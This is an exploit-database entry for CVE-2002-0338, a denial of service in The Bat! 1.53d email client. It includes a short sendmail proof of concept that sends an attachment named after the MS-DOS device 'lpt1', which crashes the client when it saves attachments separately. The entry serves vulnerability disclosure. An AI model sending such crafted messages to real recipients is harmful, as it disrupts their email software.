Rit Research Labs The Bat! 1.53 - Microsoft Denial of Service Device Name Denial of Service



EKU-ID: 26820 CVE: CVE-2002-0338;OSVDB-14398 OSVDB-ID:
Author: 3APA3A Published: 2002-02-27 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


source: https://www.securityfocus.com/bid/4187/info

The Bat! is an e-mail client for Microsoft Windows operating systems.

A problem occurs with The Bat! when it is configured to save attachments seperately from the body of a message. It is possible to include a MS-DOS device name (such as CON, AUX, PRN, etc.) in the filename of the attachment to cause a denial of service to an e-mail client with this configuration.

This appears to be an issue with The Bat! version 1.53d. Earlier versions do not appear to be affected.

bash-2.03$ sendmail -U test@test.com
From: test
To: test
Content-Type: apllication/exe; name=lpt1

Test